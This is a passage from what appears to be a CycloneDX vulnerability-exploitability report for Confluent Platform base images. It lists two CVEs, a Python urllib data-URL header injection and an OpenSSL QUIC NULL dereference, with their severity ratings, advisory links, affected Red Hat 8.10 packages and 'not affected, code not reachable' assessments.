      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15282",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15282"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15282"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0"
        },
        {
          "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47"
        },
        {
          "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a"
        },
        {
          "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f"
        },
        {
          "url": "https://github.com/python/cpython/issues/143925"
        },
        {
          "url": "https://github.com/python/cpython/pull/143926"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15282.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:37:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15468",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: If an application using the SSL_CIPHER_find() function in\na QUIC protocol client or server receives an unknown cipher suite from\nthe peer, a NULL dereference occurs.\n\nImpact summary: A NULL pointer dereference leads to abnormal termination of\nthe running process causing Denial of Service.\n\nSome applications call SSL_CIPHER_find() from the client_hello_cb callback\non the cipher ID received from the peer. If this is done with an SSL object\nimplementing the QUIC protocol, NULL pointer dereference will happen if\nthe examined cipher ID is unknown or unsupported.\n\nAs it is not very common to call this function in applications using the QUIC \nprotocol and the worst outcome is Denial of Service, the issue was assessed\nas Low severity.\n\nThe vulnerable code was introduced in the 3.2 version with the addition\nof the QUIC protocol support.\n\nThe FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue,\nas the QUIC implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue.\n\nOpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15468"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15468"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-rhx3-fg8p-f9m4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/1f08e54bad32843044fe8a675948d65e3b4ece65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7c88376731c589ee5b36116c5a6e32d5ae5f7ae2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/b2539639400288a4580fe2d76247541b976bade4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d75b309879631d45b972396ce4e5102559c64ac7"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15468.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15468"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15468"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T08:37:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
